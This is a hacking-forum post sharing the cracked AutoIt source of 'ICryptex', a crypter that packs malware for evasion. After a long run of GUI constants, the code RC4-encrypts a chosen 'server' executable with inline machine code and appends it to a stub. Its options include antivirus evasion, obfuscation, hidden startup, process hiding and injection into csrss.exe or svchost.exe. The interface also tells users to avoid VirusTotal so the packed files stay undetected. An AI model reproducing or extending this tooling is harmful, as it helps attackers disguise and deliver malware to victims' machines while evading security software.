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05-02-2014 | #1 | |
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06-02-2014 Регистрация: 05.02.2014
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Re: [AutoIt] ICryptex Security Ultimate Cracked
csrss.exe извлекаетса из криптора скрытно
Код исходника) Скрытый текст#Region
#AutoIt3Wrapper_Icon=..\..\..\Downloads\elevee-securite-icone-9032.ico #AutoIt3Wrapper_Compression=4 #AutoIt3Wrapper_UseUpx=n #AutoIt3Wrapper_Res_Comment=Coded By ThIbAhAcK (C) #AutoIt3Wrapper_Res_Description=Coded By ThIbAhAcK (C) #AutoIt3Wrapper_Res_Fileversion= #AutoIt3Wrapper_Res_LegalCopyright=Coded By ThIbAhAcK (C) #AutoIt3Wrapper_Res_Language=1077 #EndRegion #Region #EndRegion #Region #EndRegion Global Const $bs_groupbox = 7 Global Const $bs_bottom = 2048 Global Const $bs_center = 768 Global Const $bs_defpushbutton = 1 Global Const $bs_left = 256 Global Const $bs_multiline = 8192 Global Const $bs_pushbox = 10 Global Const $bs_pushlike = 4096 Global Const $bs_right = 512 Global Const $bs_rightbutton = 32 Global Const $bs_top = 1024 Global Const $bs_vcenter = 3072 Global Const $bs_flat = 32768 Global Const $bs_icon = 64 Global Const $bs_bitmap = 128 Global Const $bs_notify = 16384 Global Const $bs_splitbutton = 12 Global Const $bs_defsplitbutton = 13 Global Const $bs_commandlink = 14 Global Const $bs_defcommandlink = 15 Global Const $bcsif_glyph = 1 Global Const $bcsif_image = 2 Global Const $bcsif_style = 4 Global Const $bcsif_size = 8 Global Const $bcss_nosplit = 1 Global Const $bcss_stretch = 2 Global Const $bcss_alignleft = 4 Global Const $bcss_image = 8 Global Const $button_imagelist_align_left = 0 Global Const $button_imagelist_align_right = 1 Global Const $button_imagelist_align_top = 2 Global Const $button_imagelist_align_bottom = 3 Global Const $button_imagelist_align_center = 4 Global Const $bs_3state = 5 Global Const $bs_auto3state = 6 Global Const $bs_autocheckbox = 3 Global Const $bs_checkbox = 2 Global Const $bs_radiobutton = 4 Global Const $bs_autoradiobutton = 9 Global Const $bs_ownerdraw = 11 Global Const $gui_ss_default_button = 0 Global Const $gui_ss_default_checkbox = 0 Global Const $gui_ss_default_group = 0 Global Const $gui_ss_default_radio = 0 Global Const $bcm_first = 5632 Global Const $bcm_getidealsize = ($bcm_first + 1) Global Const $bcm_getimagelist = ($bcm_first + 3) Global Const $bcm_getnote = ($bcm_first + 10) Global Const $bcm_getnotelength = ($bcm_first + 11) Global Const $bcm_getsplitinfo = ($bcm_first + 8) Global Const $bcm_gettextmargin = ($bcm_first + 5) Global Const $bcm_setdropdownstate = ($bcm_first + 6) Global Const $bcm_setimagelist = ($bcm_first + 2) Global Const $bcm_setnote = ($bcm_first + 9) Global Const $bcm_setshield = ($bcm_first + 12) Global Const $bcm_setsplitinfo = ($bcm_first + 7) Global Const $bcm_settextmargin = ($bcm_first + 4) Global Const $bm_click = 245 Global Const $bm_getcheck = 240 Global Const $bm_getimage = 246 Global Const $bm_getstate = 242 Global Const $bm_setcheck = 241 Global Const $bm_setdontclick = 248 Global Const $bm_setimage = 247 Global Const $bm_setstate = 243 Global Const $bm_setstyle = 244 Global Const $bcn_first = -1250 Global Const $bcn_dropdown = ($bcn_first + 2) Global Const $bcn_hotitemchange = ($bcn_first + 1) Global Const $bn_clicked = 0 Global Const $bn_paint = 1 Global Const $bn_hilite = 2 Global Const $bn_unhilite = 3 Global Const $bn_disable = 4 Global Const $bn_doubleclicked = 5 Global Const $bn_setfocus = 6 Global Const $bn_killfocus = 7 Global Const $bn_pushed = $bn_hilite Global Const $bn_unpushed = $bn_unhilite Global Const $bn_dblclk = $bn_doubleclicked Global Const $bst_checked = 1 Global Const $bst_indeterminate = 2 Global Const $bst_unchecked = 0 Global Const $bst_focus = 8 Global Const $bst_pushed = 4 Global Const $bst_dontclick = 128 Global Const $es_left = 0 Global Const $es_center = 1 Global Const $es_right = 2 Global Const $es_multiline = 4 Global Const $es_uppercase = 8 Global Const $es_lowercase = 16 Global Const $es_password = 32 Global Const $es_autovscroll = 64 Global Const $es_autohscroll = 128 Global Const $es_nohidesel = 256 Global Const $es_oemconvert = 1024 Global Const $es_readonly = 2048 Global Const $es_wantreturn = 4096 Global Const $es_number = 8192 Global Const $ec_err = -1 Global Const $ecm_first = 5376 Global Const $em_canundo = 198 Global Const $em_charfrompos = 215 Global Const $em_emptyundobuffer = 205 Global Const $em_fmtlines = 200 Global Const $em_getcuebanner = ($ecm_first + 2) Global Const $em_getfirstvisibleline = 206 Global Const $em_gethandle = 189 Global Const $em_getimestatus = 217 Global Const $em_getlimittext = 213 Global Const $em_getline = 196 Global Const $em_getlinecount = 186 Global Const $em_getmargins = 212 Global Const $em_getmodify = 184 Global Const $em_getpasswordchar = 210 Global Const $em_getrect = 178 Global Const $em_getsel = 176 Global Const $em_getthumb = 190 Global Const $em_getwordbreakproc = 209 Global Const $em_hideballoontip = ($ecm_first + 4) Global Const $em_limittext = 197 Global Const $em_linefromchar = 201 Global Const $em_lineindex = 187 Global Const $em_linelength = 193 Global Const $em_linescroll = 182 Global Const $em_posfromchar = 214 Global Const $em_replacesel = 194 Global Const $em_scroll = 181 Global Const $em_scrollcaret = 183 Global Const $em_setcuebanner = ($ecm_first + 1) Global Const $em_sethandle = 188 Global Const $em_setimestatus = 216 Global Const $em_setlimittext = $em_limittext Global Const $em_setmargins = 211 Global Const $em_setmodify = 185 Global Const $em_setpasswordchar = 204 Global Const $em_setreadonly = 207 Global Const $em_setrect = 179 Global Const $em_setrectnp = 180 Global Const $em_setsel = 177 Global Const $em_settabstops = 203 Global Const $em_setwordbreakproc = 208 Global Const $em_showballoontip = ($ecm_first + 3) Global Const $em_undo = 199 Global Const $ec_leftmargin = 1 Global Const $ec_rightmargin = 2 Global Const $ec_usefontinfo = 65535 Global Const $emsis_compositionstring = 1 Global Const $eimes_getcompstratonce = 1 Global Const $eimes_cancelcompstrinfocus = 2 Global Const $eimes_completecompstrkillfocus = 4 Global Const $en_align_ltr_ec = 1792 Global Const $en_align_rtl_ec = 1793 Global Const $en_change = 768 Global Const $en_errspace = 1280 Global Const $en_hscroll = 1537 Global Const $en_killfocus = 512 Global Const $en_maxtext = 1281 Global Const $en_setfocus = 256 Global Const $en_update = 1024 Global Const $en_vscroll = 1538 Global Const $tti_none = 0 Global Const $tti_info = 1 Global Const $tti_warning = 2 Global Const $tti_error = 3 Global Const $tti_info_large = 4 Global Const $tti_warning_large = 5 Global Const $tti_error_large = 6 Global Const $__editconstant_ws_vscroll = 2097152 Global Const $__editconstant_ws_hscroll = 1048576 Global Const $gui_ss_default_edit = BitOR($es_wantreturn, $__editconstant_ws_vscroll, $__editconstant_ws_hscroll, $es_autovscroll, $es_autohscroll) Global Const $gui_ss_default_input = BitOR($es_left, $es_autohscroll) Global Const $gui_event_close = -3 Global Const $gui_event_minimize = -4 Global Const $gui_event_restore = -5 Global Const $gui_event_maximize = -6 Global Const $gui_event_primarydown = -7 Global Const $gui_event_primaryup = -8 Global Const $gui_event_secondarydown = -9 Global Const $gui_event_secondaryup = -10 Global Const $gui_event_mousemove = -11 Global Const $gui_event_resized = -12 Global Const $gui_event_dropped = -13 Global Const $gui_rundefmsg = "GUI_RUNDEFMSG" Global Const $gui_avistop = 0 Global Const $gui_avistart = 1 Global Const $gui_aviclose = 2 Global Const $gui_checked = 1 Global Const $gui_indeterminate = 2 Global Const $gui_unchecked = 4 Global Const $gui_dropaccepted = 8 Global Const $gui_nodropaccepted = 4096 Global Const $gui_acceptfiles = $gui_dropaccepted Global Const $gui_show = 16 Global Const $gui_hide = 32 Global Const $gui_enable = 64 Global Const $gui_disable = 128 Global Const $gui_focus = 256 Global Const $gui_nofocus = 8192 Global Const $gui_defbutton = 512 Global Const $gui_expand = 1024 Global Const $gui_ontop = 2048 Global Const $gui_fontitalic = 2 Global Const $gui_fontunder = 4 Global Const $gui_fontstrike = 8 Global Const $gui_dockauto = 1 Global Const $gui_dockleft = 2 Global Const $gui_dockright = 4 Global Const $gui_dockhcenter = 8 Global Const $gui_docktop = 32 Global Const $gui_dockbottom = 64 Global Const $gui_dockvcenter = 128 Global Const $gui_dockwidth = 256 Global Const $gui_dockheight = 512 Global Const $gui_docksize = 768 Global Const $gui_dockmenubar = 544 Global Const $gui_dockstatebar = 576 Global Const $gui_dockall = 802 Global Const $gui_dockborders = 102 Global Const $gui_gr_close = 1 Global Const $gui_gr_line = 2 Global Const $gui_gr_bezier = 4 Global Const $gui_gr_move = 6 Global Const $gui_gr_color = 8 Global Const $gui_gr_rect = 10 Global Const $gui_gr_ellipse = 12 Global Const $gui_gr_pie = 14 Global Const $gui_gr_dot = 16 Global Const $gui_gr_pixel = 18 Global Const $gui_gr_hint = 20 Global Const $gui_gr_refresh = 22 Global Const $gui_gr_pensize = 24 Global Const $gui_gr_nobkcolor = -2 Global Const $gui_bkcolor_default = -1 Global Const $gui_bkcolor_transparent = -2 Global Const $gui_bkcolor_lv_alternate = -33554432 Global Const $gui_ws_ex_parentdrag = 1048576 Global Const $ws_tiled = 0 Global Const $ws_overlapped = 0 Global Const $ws_maximizebox = 65536 Global Const $ws_minimizebox = 131072 Global Const $ws_tabstop = 65536 Global Const $ws_group = 131072 Global Const $ws_sizebox = 262144 Global Const $ws_thickframe = 262144 Global Const $ws_sysmenu = 524288 Global Const $ws_hscroll = 1048576 Global Const $ws_vscroll = 2097152 Global Const $ws_dlgframe = 4194304 Global Const $ws_border = 8388608 Global Const $ws_caption = 12582912 Global Const $ws_overlappedwindow = 13565952 Global Const $ws_tiledwindow = 13565952 Global Const $ws_maximize = 16777216 Global Const $ws_clipchildren = 33554432 Global Const $ws_clipsiblings = 67108864 Global Const $ws_disabled = 134217728 Global Const $ws_visible = 268435456 Global Const $ws_minimize = 536870912 Global Const $ws_child = 1073741824 Global Const $ws_popup = -2147483648 Global Const $ws_popupwindow = -2138570752 Global Const $ds_modalframe = 128 Global Const $ds_setforeground = 512 Global Const $ds_contexthelp = 8192 Global Const $ws_ex_acceptfiles = 16 Global Const $ws_ex_mdichild = 64 Global Const $ws_ex_appwindow = 262144 Global Const $ws_ex_composited = 33554432 Global Const $ws_ex_clientedge = 512 Global Const $ws_ex_contexthelp = 1024 Global Const $ws_ex_dlgmodalframe = 1 Global Const $ws_ex_leftscrollbar = 16384 Global Const $ws_ex_overlappedwindow = 768 Global Const $ws_ex_right = 4096 Global Const $ws_ex_staticedge = 131072 Global Const $ws_ex_toolwindow = 128 Global Const $ws_ex_topmost = 8 Global Const $ws_ex_transparent = 32 Global Const $ws_ex_windowedge = 256 Global Const $ws_ex_layered = 524288 Global Const $ws_ex_controlparent = 65536 Global Const $ws_ex_layoutrtl = 4194304 Global Const $ws_ex_rtlreading = 8192 Global Const $wm_gettextlength = 14 Global Const $wm_gettext = 13 Global Const $wm_size = 5 Global Const $wm_sizing = 532 Global Const $wm_user = 1024 Global Const $wm_create = 1 Global Const $wm_destroy = 2 Global Const $wm_move = 3 Global Const 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18 Global Const $nm_tooltipscreated = $nm_first - 19 Global Const $nm_ldown = $nm_first - 20 Global Const $nm_rdown = $nm_first - 21 Global Const $nm_themechanged = $nm_first - 22 Global Const $wm_mousefirst = 512 Global Const $wm_mousemove = 512 Global Const $wm_lbuttondown = 513 Global Const $wm_lbuttonup = 514 Global Const $wm_lbuttondblclk = 515 Global Const $wm_rbuttondown = 516 Global Const $wm_rbuttonup = 517 Global Const $wm_rbuttondblclk = 518 Global Const $wm_mbuttondown = 519 Global Const $wm_mbuttonup = 520 Global Const $wm_mbuttondblclk = 521 Global Const $wm_mousewheel = 522 Global Const $wm_xbuttondown = 523 Global Const $wm_xbuttonup = 524 Global Const $wm_xbuttondblclk = 525 Global Const $wm_mousehwheel = 526 Global Const $ps_solid = 0 Global Const $ps_dash = 1 Global Const $ps_dot = 2 Global Const $ps_dashdot = 3 Global Const $ps_dashdotdot = 4 Global Const $ps_null = 5 Global Const $ps_insideframe = 6 Global Const $lwa_alpha = 2 Global Const $lwa_colorkey = 1 Global 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$sm_cxdlgframe = 7 Global Const $sm_cydlgframe = 8 Global Const $sm_cyvthumb = 9 Global Const $sm_cxhthumb = 10 Global Const $sm_cxicon = 11 Global Const $sm_cyicon = 12 Global Const $sm_cxcursor = 13 Global Const $sm_cycursor = 14 Global Const $sm_cymenu = 15 Global Const $sm_cxfullscreen = 16 Global Const $sm_cyfullscreen = 17 Global Const $sm_cykanjiwindow = 18 Global Const $sm_mousepresent = 19 Global Const $sm_cyvscroll = 20 Global Const $sm_cxhscroll = 21 Global Const $sm_debug = 22 Global Const $sm_swapbutton = 23 Global Const $sm_reserved1 = 24 Global Const $sm_reserved2 = 25 Global Const $sm_reserved3 = 26 Global Const $sm_reserved4 = 27 Global Const $sm_cxmin = 28 Global Const $sm_cymin = 29 Global Const $sm_cxsize = 30 Global Const $sm_cysize = 31 Global Const $sm_cxframe = 32 Global Const $sm_cyframe = 33 Global Const $sm_cxmintrack = 34 Global Const $sm_cymintrack = 35 Global Const $sm_cxdoubleclk = 36 Global Const $sm_cydoubleclk = 37 Global Const $sm_cxiconspacing = 38 Global Const $sm_cyiconspacing = 39 Global Const $sm_menudropalignment = 40 Global Const $sm_penwindows = 41 Global Const $sm_dbcsenabled = 42 Global Const $sm_cmousebuttons = 43 Global Const $sm_secure = 44 Global Const $sm_cxedge = 45 Global Const $sm_cyedge = 46 Global Const $sm_cxminspacing = 47 Global Const $sm_cyminspacing = 48 Global Const $sm_cxsmicon = 49 Global Const $sm_cysmicon = 50 Global Const $sm_cysmcaption = 51 Global Const $sm_cxsmsize = 52 Global Const $sm_cysmsize = 53 Global Const $sm_cxmenusize = 54 Global Const $sm_cymenusize = 55 Global Const $sm_arrange = 56 Global Const $sm_cxminimized = 57 Global Const $sm_cyminimized = 58 Global Const $sm_cxmaxtrack = 59 Global Const $sm_cymaxtrack = 60 Global Const $sm_cxmaximized = 61 Global Const $sm_cymaximized = 62 Global Const $sm_network = 63 Global Const $sm_cleanboot = 67 Global Const $sm_cxdrag = 68 Global Const $sm_cydrag = 69 Global Const $sm_showsounds = 70 Global Const $sm_cxmenucheck = 71 Global Const $sm_cymenucheck = 72 Global Const $sm_slowmachine = 73 Global Const $sm_mideastenabled = 74 Global Const $sm_mousewheelpresent = 75 Global Const $sm_xvirtualscreen = 76 Global Const $sm_yvirtualscreen = 77 Global Const $sm_cxvirtualscreen = 78 Global Const $sm_cyvirtualscreen = 79 Global Const $sm_cmonitors = 80 Global Const $sm_samedisplayformat = 81 Global Const $sm_immenabled = 82 Global Const $sm_cxfocusborder = 83 Global Const $sm_cyfocusborder = 84 Global Const $sm_tabletpc = 86 Global Const $sm_mediacenter = 87 Global Const $sm_starter = 88 Global Const $sm_serverr2 = 89 Global Const $sm_cmetrics = 90 Global Const $sm_remotesession = 4096 Global Const $sm_shuttingdown = 8192 Global Const $sm_remotecontrol = 8193 Global Const $sm_caretblinkingenabled = 8194 Global Const $blackness = 66 Global Const $captureblt = 1073741824 Global Const $dstinvert = 5570569 Global Const $mergecopy = 12583114 Global Const $mergepaint = 12255782 Global Const $nomirrorbitmap = -2147483648 Global Const $notsrccopy = 3342344 Global Const $notsrcerase = 1114278 Global Const $patcopy = 15728673 Global Const $patinvert = 5898313 Global Const $patpaint = 16452105 Global Const $srcand = 8913094 Global Const $srccopy = 13369376 Global Const $srcerase = 4457256 Global Const $srcinvert = 6684742 Global Const $srcpaint = 15597702 Global Const $whiteness = 16711778 Global Const $dt_bottom = 8 Global Const $dt_calcrect = 1024 Global Const $dt_center = 1 Global Const $dt_editcontrol = 8192 Global Const $dt_end_ellipsis = 32768 Global Const $dt_expandtabs = 64 Global Const $dt_externalleading = 512 Global Const $dt_hideprefix = 1048576 Global Const $dt_internal = 4096 Global Const $dt_left = 0 Global Const $dt_modifystring = 65536 Global Const $dt_noclip = 256 Global Const $dt_nofullwidthcharbreak = 524288 Global Const $dt_noprefix = 2048 Global Const $dt_path_ellipsis = 16384 Global Const $dt_prefixonly = 2097152 Global Const $dt_right = 2 Global Const $dt_rtlreading = 131072 Global Const $dt_singleline = 32 Global Const $dt_tabstop = 128 Global Const $dt_top = 0 Global Const $dt_vcenter = 4 Global Const $dt_wordbreak = 16 Global Const $dt_word_ellipsis = 262144 Global Const $rdw_erase = 4 Global Const $rdw_frame = 1024 Global Const $rdw_internalpaint = 2 Global Const $rdw_invalidate = 1 Global Const $rdw_noerase = 32 Global Const $rdw_noframe = 2048 Global Const $rdw_nointernalpaint = 16 Global Const $rdw_validate = 8 Global Const $rdw_erasenow = 512 Global Const $rdw_updatenow = 256 Global Const $rdw_allchildren = 128 Global Const $rdw_nochildren = 64 Global Const $wm_renderformat = 773 Global Const $wm_renderallformats = 774 Global Const $wm_destroyclipboard = 775 Global Const $wm_drawclipboard = 776 Global Const $wm_paintclipboard = 777 Global Const $wm_vscrollclipboard = 778 Global Const $wm_sizeclipboard = 779 Global Const $wm_askcbformatname = 780 Global Const $wm_changecbchain = 781 Global Const $wm_hscrollclipboard = 782 Global Const $hterror = -2 Global Const $httransparent = -1 Global Const $htnowhere = 0 Global Const $htclient = 1 Global Const $htcaption = 2 Global Const $htsysmenu = 3 Global Const $htgrowbox = 4 Global Const $htsize = $htgrowbox Global Const $htmenu = 5 Global Const $hthscroll = 6 Global Const $htvscroll = 7 Global Const $htminbutton = 8 Global Const $htmaxbutton = 9 Global Const $htleft = 10 Global Const $htright = 11 Global Const $httop = 12 Global Const $httopleft = 13 Global Const $httopright = 14 Global Const $htbottom = 15 Global Const $htbottomleft = 16 Global Const $htbottomright = 17 Global Const $htborder = 18 Global Const $htreduce = $htminbutton Global Const $htzoom = $htmaxbutton Global Const $htsizefirst = $htleft Global Const $htsizelast = $htbottomright Global Const $htobject = 19 Global Const $htclose = 20 Global Const $hthelp = 21 Global Const $color_scrollbar = 0 Global Const $color_background = 1 Global Const $color_activecaption = 2 Global Const $color_inactivecaption = 3 Global Const $color_menu = 4 Global Const $color_window = 5 Global Const $color_windowframe = 6 Global Const $color_menutext = 7 Global Const $color_windowtext = 8 Global Const $color_captiontext = 9 Global Const $color_activeborder = 10 Global Const $color_inactiveborder = 11 Global Const $color_appworkspace = 12 Global Const $color_highlight = 13 Global Const $color_highlighttext = 14 Global Const $color_btnface = 15 Global Const $color_btnshadow = 16 Global Const $color_graytext = 17 Global Const $color_btntext = 18 Global Const $color_inactivecaptiontext = 19 Global Const $color_btnhighlight = 20 Global Const $color_3ddkshadow = 21 Global Const $color_3dlight = 22 Global Const $color_infotext = 23 Global Const $color_infobk = 24 Global Const $color_hotlight = 26 Global Const $color_gradientactivecaption = 27 Global Const $color_gradientinactivecaption = 28 Global Const $color_menuhilight = 29 Global Const $color_menubar = 30 Global Const $color_desktop = 1 Global Const $color_3dface = 15 Global Const $color_3dshadow = 16 Global Const $color_3dhighlight = 20 Global Const $color_3dhilight = 20 Global Const $color_btnhilight = 20 Global Const $hinst_commctrl = -1 Global Const $idb_std_small_color = 0 Global Const $idb_std_large_color = 1 Global Const $idb_view_small_color = 4 Global Const $idb_view_large_color = 5 Global Const $idb_hist_small_color = 8 Global Const $idb_hist_large_color = 9 Global Const $startf_forceofffeedback = 128 Global Const $startf_forceonfeedback = 64 Global Const $startf_runfullscreen = 32 Global Const $startf_usecountchars = 8 Global Const $startf_usefillattribute = 16 Global Const $startf_usehotkey = 512 Global Const $startf_useposition = 4 Global Const $startf_useshowwindow = 1 Global Const $startf_usesize = 2 Global Const $startf_usestdhandles = 256 Global Const $cdds_prepaint = 1 Global Const $cdds_postpaint = 2 Global Const $cdds_preerase = 3 Global Const $cdds_posterase = 4 Global Const $cdds_item = 65536 Global Const $cdds_itemprepaint = 65537 Global Const $cdds_itempostpaint = 65538 Global Const $cdds_itempreerase = 65539 Global Const $cdds_itemposterase = 65540 Global Const $cdds_subitem = 131072 Global Const $cdis_selected = 1 Global Const $cdis_grayed = 2 Global Const $cdis_disabled = 4 Global Const $cdis_checked = 8 Global Const $cdis_focus = 16 Global Const $cdis_default = 32 Global Const $cdis_hot = 64 Global Const $cdis_marked = 128 Global Const $cdis_indeterminate = 256 Global Const $cdis_showkeyboardcues = 512 Global Const $cdis_nearhot = 1024 Global Const $cdis_othersidehot = 2048 Global Const $cdis_drophilited = 4096 Global Const $cdrf_dodefault = 0 Global Const $cdrf_newfont = 2 Global Const $cdrf_skipdefault = 4 Global Const $cdrf_notifypostpaint = 16 Global Const $cdrf_notifyitemdraw = 32 Global Const $cdrf_notifysubitemdraw = 32 Global Const $cdrf_notifyposterase = 64 Global Const $cdrf_doerase = 8 Global Const $cdrf_skippostpaint = 256 Global Const $gui_ss_default_gui = BitOR($ws_minimizebox, $ws_caption, $ws_popup, $ws_sysmenu) #Region ### START Koda GUI section ### Form= Opt("GuiOnEventMode", 1) $skin = @ScriptDir & "\1.msstyles" DllCall("kernel32.dll", "handle", "LoadLibraryW", "wstr", "Skin.dll") DllCall("Skin.dll", "int", "USkinInit", "ptr", "", "ptr", "", "str", $skin) $form1 = GUICreate("ICryptex SГ©curity Ultimate", 386, 354, -1, -1, -1) $tab1 = GUICtrlCreateTab(0, 120, 385, 233) GUICtrlSetResizing(-1, $gui_dockwidth + $gui_dockheight) $tabsheet2 = GUICtrlCreateTabItem("Home") $pic3 = GUICtrlCreatePic("C:\Windows\Microsoft.NET\icrypt.jpg", 0, 0, 385, 121) $label2 = GUICtrlCreateLabel("Do not Scan VirusTotal , JottiMalware , VirScan.org", 8, 152, 330, 17) $label3 = GUICtrlCreateLabel("VirusChief.com , Metascan Online.", 8, 172, 330, 17) $label4 = GUICtrlCreateLabel("Thank you for using the Integrated ICryptex Scanner", 8, 192, 330, 17) $label5 = GUICtrlCreateLabel("Please contact me on Skype if there is any question or concern.", 8, 212, 330, 17) $label6 = GUICtrlCreateLabel("ICryptex does not crypt .NET files!", 8, 232, 330, 17) $label7 = GUICtrlCreateLabel("Startup added !", 8, 252, 330, 17) $label8 = GUICtrlCreateLabel("Skype : footballclas", 8, 272, 330, 17) $label9 = GUICtrlCreateLabel("Enjoy ICryptex !", 8, 292, 330, 17) $tab2 = GUICtrlCreateTab(0, 120, 385, 233) GUICtrlSetResizing(-1, $gui_dockwidth + $gui_dockheight) $tabsheet5 = GUICtrlCreateTabItem("Stub") $pic1 = GUICtrlCreatePic("C:\Windows\Microsoft.NET\icrypt.jpg", 0, 0, 385, 121) $radio1 = GUICtrlCreateRadio("Stub #1", 16, 152, 56, 17) $pic17 = GUICtrlCreatePic("C:\Windows\Microsoft.NET\vert.jpg", 16, 190, 56, 56) $pic18 = GUICtrlCreatePic("C:\Windows\Microsoft.NET\orange.jpg", 153, 190, 56, 56) $pic18 = GUICtrlCreatePic("C:\Windows\Microsoft.NET\nero.jpg", 310, 190, 56, 56) $radio2 = GUICtrlCreateRadio("Stub #2", 153, 152, 56, 17) $radio3 = GUICtrlCreateRadio("Stub #3", 310, 152, 57, 17) $label22 = GUICtrlCreateLabel("Select one of the three stubs offered. (These three stubs are each unique!)", 18, 310, 360, 15) GUICtrlSetState($radio1, $gui_checked) $tabsheet3 = GUICtrlCreateTabItem("Settings") $checkbox11 = GUICtrlCreateCheckbox("Startup", 16, 220, 56, 17) $checkbox5 = GUICtrlCreateCheckbox("Anti-Methods", 80, 220, 80, 17) $checkbox6 = GUICtrlCreateCheckbox("Anti-VT", 168, 220, 57, 17) $checkbox3 = GUICtrlCreateCheckbox("Obfuscation", 225, 220, 80, 17) $checkbox9 = GUICtrlCreateCheckbox("Melt File", 305, 220, 75, 17) $label5 = GUICtrlCreateLabel("Choose Injection :", 12, 252, 90, 17) $combo1 = GUICtrlCreateCombo("vbc.exe", 108, 250, 80, 17) GUICtrlSetData(-1, "csrss.exe|svchost.exe", "vbc.exe") $label9 = GUICtrlCreateLabel("Mutex :", 12, 275, 90, 17) $checkbox16 = GUICtrlCreateCheckbox("Hidden Startup", 12, 300, 90, 17) $checkbox17 = GUICtrlCreateCheckbox("Hide Process", 12, 325, 90, 17) $textbox9 = GUICtrlCreateInput("H1hr89HR87EEUOH69", 55, 275, 133, 17) $label1 = GUICtrlCreateLabel("Choose your server encrypted :", 8, 152, 180, 17) $input1 = GUICtrlCreateInput("", 8, 176, 369, 21) $button1 = GUICtrlCreateButton("*.exe", 8, 200, 59, 17, $ws_group) $pic1 = GUICtrlCreatePic("C:\Windows\Microsoft.NET\icrypt.jpg", 0, 0, 385, 121) GUICtrlSetFont(-1, 12, 400, 0, "Verdana") GUICtrlSetState(-1, $gui_checked) GUICtrlSetBkColor(-1, 16777215) $button69 = GUICtrlCreateButton("Binder", 200, 330, 88, 15) $button55 = GUICtrlCreateButton(".Net Crypter", 200, 310, 88, 15) $button3 = GUICtrlCreateButton("Icon Changer", 290, 330, 88, 15) $button4 = GUICtrlCreateButton("Assembly", 290, 310, 88, 15) $button5 = GUICtrlCreateButton("Scanner", 290, 290, 88, 15) $tab3 = GUICtrlCreateTab(0, 120, 385, 233) GUICtrlSetResizing(-1, $gui_dockwidth + $gui_dockheight) $tabsheet6 = GUICtrlCreateTabItem("Build") $pic1 = GUICtrlCreatePic("C:\Windows\Microsoft.NET\icrypt.jpg", 0, 0, 385, 121) $edit1 = GUICtrlCreateEdit("", 8, 152, 369, 153, BitOR($es_autovscroll, $es_autohscroll, $es_readonly, $es_wantreturn, $ws_vscroll)) $editcontent = "[*] ICryptex is ready !" $button2 = GUICtrlCreateButton("Build", 144, 320, 75, 25, $ws_group) $tabsheet4 = GUICtrlCreateTabItem("About") $pic3 = GUICtrlCreatePic("C:\Windows\Microsoft.NET\icrypt.jpg", 0, 0, 385, 121) $label5 = GUICtrlCreateLabel("Coded By ThIbAhAcK", 8, 212, 330, 17) $label5 = GUICtrlCreateLabel("Coded in AutoIt/ASM", 8, 232, 330, 17) GUICtrlCreateTabItem("") GUISetState(@SW_SHOW) #EndRegion ### END Koda GUI section ### $editcontent = "[*] ICryptex is ready !" AdlibRegister("RefreshEdit", 1000) GUICtrlSetOnEvent($button1, "Abrir") GUICtrlSetOnEvent($button2, "Encryptar") GUICtrlSetOnEvent($button3, "icon") GUICtrlSetOnEvent($button4, "assembly") GUICtrlSetOnEvent($button69, "Binder") GUICtrlSetOnEvent($button55, "NetCrypter") GUICtrlSetOnEvent($button5, "Scanner") GUISetOnEvent($gui_event_close, "sair") Func abrir() GUICtrlSetData($input1, FileOpenDialog("Select the file to encrypt", @DesktopDir, "Executable(*.exe)")) EndFunc Func encryptar() $editcontent = "" writeedit("[*] Loading Settings ...") If GUICtrlRead($input1) = "" Then Return writeedit("[*] Loading Stub ...") If GUICtrlRead($radio1) = 1 Then $stub = FileOpen(@ScriptDir & "\Stub.exe", 16) Else EndIf If GUICtrlRead($radio2) = 1 Then $stub = FileOpen(@ScriptDir & "\Stub2.exe", 16) Else EndIf If GUICtrlRead($radio3) = 1 Then $stub = FileOpen(@ScriptDir & "\Stub3.exe", 16) Else EndIf $file = FileOpen(GUICtrlRead($input1), 16) $s = FileRead($stub) $f = FileRead($file) writeedit("[*] Loading Encryption ...") $f = _rc4($f, "9XNYNzNbMs1m=2xmv4V4MQ//") $abri = FileOpen(FileSaveDialog("Save As ...", @DesktopDir, "Executable(*.exe)") & ".exe", 18) $thechar = Chr(34) $finetstall = "" writeedit("[*] Encrypt Server ...") FileWrite($abri, $s) FileWrite($abri, StringToBinary("O2lU3KMLOs8jNDMg9XZN9nMj1Wvoyl6gNkxBMjqg02kp7TRW928fug//")) FileWrite($abri, $f) FileClose($stub) FileClose($file) FileClose($abri) writeedit("[*] Finish !") EndFunc Func sair() Exit EndFunc Func writeedit($line) $editcontent = $editcontent & @CRLF & $line EndFunc Func refreshedit() GUICtrlSetData($edit1, $editcontent) EndFunc Func icon() Run("iconechanger.exe") EndFunc Func assembly() Run("assembly.exe") EndFunc Func netcrypter() MsgBox(4096, "Infos", "Go to Purchase Destinity Crypter", 10) EndFunc Func binder() Run("Binder.exe") EndFunc Func chectoboolstr($hcid) $val = GUICtrlRead($hcid) If $val = 1 Then Return "True" Else Return "False" EndIf EndFunc Func scanner() Run("scanner.exe") EndFunc Func _rc4($data, $key) Local $opcode = "0xC81001006A006A005356578B551031C989C84989D7F2AE484829C88945F085C00F84DC000000B90001000088C82C0188840DEFFEFFFFE2F38365F4008365FC00817DFC000100007D478B45FC31D2F775F0920345100FB6008B4DFC0FB68C0DF0FEFFFF01C80345F425FF0000008945F48B75FC8A8435F0FEFFFF8B7DF486843DF0FEFFFF888435F0FEFFFFFF45FCEBB08D9DF0FEFFFF31FF89FA39550C76638B85ECFEFFFF4025FF0000008985ECFEFFFF89D80385ECFEFFFF0FB6000385E8FEFFFF25FF0000008985E8FEFFFF89DE03B5ECFEFFFF8A0689DF03BDE8FEFFFF860788060FB60E0FB60701C181E1FF0000008A840DF0FEFFFF8B750801D6300642EB985F5E5BC9C21000" Local $codebuffer = DllStructCreate("byte[" & BinaryLen($opcode) & "]") DllStructSetData($codebuffer, 1, $opcode) Local $buffer = DllStructCreate("byte[" & BinaryLen($data) & "]") DllStructSetData($buffer, 1, $data) DllCall("user32.dll", "none", "CallWindowProc", "ptr", DllStructGetPtr($codebuffer), "ptr", DllStructGetPtr($buffer), "int", BinaryLen($data), "str", $key, "int", 0) Local $ret = DllStructGetData($buffer, 1) $buffer = 0 $codebuffer = 0 Return $ret EndFunc While 1 Sleep(1) WEnd |
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autoit, const, cracked, global, icryptex, security, ultimate |
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